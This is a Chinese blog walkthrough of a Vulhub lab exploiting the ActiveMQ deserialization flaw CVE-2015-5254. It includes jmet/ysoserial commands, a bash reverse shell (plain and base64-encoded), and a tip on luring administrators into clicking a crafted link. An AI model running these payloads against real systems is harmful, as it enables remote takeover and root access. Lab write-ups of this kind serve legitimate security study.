Vulhub漏洞之ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)

最新推荐文章于 2024-05-18 11:30:07 发布
最新推荐文章于 2024-05-18 11:30:07 发布
阅读量4.4k 收藏 1
点赞数 1
分类专栏: 任意命令执行 文章标签: web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FryhRx/article/details/123829882
版权

Vulhub漏洞之ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)

一、搭建环境

1、安装好docker和vulhub
如何搭建vulhub靶场的链接

pip install docker-compose

git clone git://github.com/vulhub/vulhub.git

之后进入相应目录

cd vulhub/activemq/CVE-2015-5254/

启动环境

docker-compose up -d

如果环境启动失败,有可能是因为源没有换成国内的。

进入这个目录

cd /ect/docker/daemon.json

将源换成阿里云

{
 "registry-mirrors":["https://6kx4zyno.mirror.aliyuncs.com"]
}

重启docker服务

systemctl daemon-reload 
systemctl restart docker

二、利用

受害机:192.168.233.129
攻击机:192.168.233.128

运行环境后,会在端口61616和8161上建立两个端口。端口61616是工作端口,消息在这个端口上传递。8161端口为网页管理页面端口。访问http://your-ip:8161,可以看到网管页面,但是这个漏洞理论上不需要网络。
环境启动成功后可以看到的页面
漏洞利用过程如下:

1. 生成序列化的有效载荷(你可以使用 ysoserial)
2. 将有效负载发送到端口 61616
3. 访问网页管理页面并阅读序列化消息,然后您可以触发漏洞。

为了利用这个环境,我们将使用jmet(Java Message Exploitation Tool)。首先下载jmet的jar文件,在同一目录下创建名为external的文件夹(否则可能会出现文件夹不存在的错误)。

jmet是使用ysoserial生成Payload并发送(ysoserial自带jar,我们不需要再下载了),所以我们需要选择一个可以在ysoserial中使用的gadget,比如ROME .

之后在另一台主机构造如下payload:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

your-ip 改成受害方的ip地址
在这里插入图片描述

此时,一个名为 event 的队列将被添加到目标 ActiveMQ 中。

之后在受害方的浏览器访问url以查看此队列中的所有消息。

http://127.0.0.1:8161/admin/browse.jsp?JMSDestination=Event

(登录名/密码: admin/admin)
在这里插入图片描述
点击一下id进入查看即可触发漏洞
在这里插入图片描述
进入容器

docker-compose exec activemq bash

查看tmp目录下有相应文件,利用成功
在这里插入图片描述
kali反弹shell:
bash -i >& /dev/tcp/192.168.233.128/8888 0>&1 base64编码得到

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMy4xMjgvODg4OCAwPiYx

payload如下

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMy4xMjgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.233.128 61616

攻击方监听8888端口
在这里插入图片描述
成功拿到root权限

总结

值得注意的是,通过网页管理页面访问消息并触发漏洞需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接来触发,或者伪装成来自其他服务的合法消息需要等待客户端访问时才触发。

泡泡玛特️
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
activemq 命令执行漏洞cve-2015-5254)
QuanPangShu的博客
06-14 267
activemq 命令执行漏洞cve-2015-5254)
vulhub漏洞复现】CVE-2015-5254 ActiveMQ序列漏洞
RexHa的博客
02-26 1856
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
CVE-2015-5254复现学习
最新发布
shierbai的博客
05-18 350
使用[jmet](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)进行漏洞利用。影响版本:Apache ActiveMQ 5.13.0之前5.x版本,https://www.cvedetails.com/cve/CVE-2015-5254/实际环境下,需要诱导管理员点击我们构造的url去做访问,触发弹条件。bash -i>/dev/tcp/攻击机ip/1234(监听端口) 0>&1。
01 - vulhub - ActiveMq - CVE-2015-5254
易编橙 · 终身成长社群,相遇已是上上签!
09-18 614
漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行恶意的代码。
Activemq的几个命令行语句
weixin_33894992的博客
11-24 502
#!/bin/bash mqpid=`pgrep-factivemq.jar|wc-l` if[$mqpid-eq0] then echo"startActiveMQnow..." exportJAVA_HOME=/usr/jdk1.7.0_79 exportCLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JA...
Activemq远程代码执行漏洞
hackerie的博客
09-08 1287
https://www.seebug.org/vuldb/ssvid-96268
ActiveMQ 序列漏洞CVE-2015-5254)利用工具
08-15
在2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个序列漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 序列漏洞通常发生在对象从...
ActiveMQ序列漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ序列漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
boot-example-activemq-topic-2.0.5
01-27
SpringBoot+ActiveMQ-发布订阅 Topic 主题 * 消息消费者(订阅方式)消费该消息 * 消费生产者将发布到topic中,同时有多个消息消费者(订阅)消费该消息 * 这种方式和点对点方式不同,发布到topic的消息会被所有...
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
ActiveMQ-CPP Library 3.9.5在Windows环境下的编译与应用》 ActiveMQ-CPP Library 3.9.5是一款专为C++开发者设计的、用于与Apache ActiveMQ集成的库,它提供了丰富的API接口,使得在C++环境中能够方便地发送和...
activemq-core-5.7.0-API文档-中英对照版.zip
04-08
赠送jar包:activemq-core-5.7.0.jar; 赠送原API文档:activemq-core-5.7.0-javadoc.jar; 赠送源代码:activemq-core-5.7.0-sources.jar; 包含翻译后的API文档:activemq-core-5.7.0-javadoc-API文档-中文...
ActiveMQ 序列漏洞复现(CVE-2015-5254)
oiadkt的博客
04-14 518
ActiveMQ 序列漏洞复现(CVE-2015-5254)
【网络安全---漏洞复现】shiro550序列漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4198
shiro550序列漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
shiro550序列漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-16 1万+
本文是shiro550漏洞CVE-2016-4437)的漏洞原理和漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形漏洞利用工具,最终实现弹shell和任意命令执行
Vulhub漏洞ActiveMQ 序列任意命令执行漏洞 (CVE-2015-5254)【漏洞复现利用以及常见问题解决方案】
我这不是依托答辩随你怎么说
02-15 458
java版本太高不兼容,上述问题出现时所用java版本为java17。再安装一个较低版本的java,我安装的是java1.8,安装方法参考。注意命令中event的大小写问题,很多文章(包括官网)都存在这个书写的细节错误。Exception in thread "main" java.lang.IllegalAccessError:......because module java.xml dose not export...
jboss漏洞复现
赵花花08042的博客
12-13 719
JBoss JMXInvokerServlet 序列漏洞 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ https://paper.seebug.org/312/ https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的
常见端口漏洞
热门推荐
Jim的博客
09-04 2万+
Windows中可以通过Internet信息服务(IIS)来提供FTP连接和管理,也可以单独安装FTP服务器软件来实现FTP功能,比如常见的FTP Serv-U。
ActiveMQ 序列漏洞 (CVE-2015-5254)
qq_32642035的博客
10-17 1220
ActiveMQ 序列漏洞 (CVE-2015-5254)漏洞复现
vulhub——shiro序列getshell漏洞复现
web17535224648的博客
08-26 1233
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java序列漏洞,进而在目标机器上执行任意命令。...
activemq哪些版本解决了CVE-2022-2048漏洞
06-10
CVE-2022-2048是ActiveMQ的一个安全漏洞,这个漏洞可以允许攻击者通过发送特制的消息来执行任意代码。Apache ActiveMQ从5.15.16开始修复了这个漏洞。因此,如果你使用的是Apache ActiveMQ 5.15.16或更高版本,则已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

泡泡玛特️

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值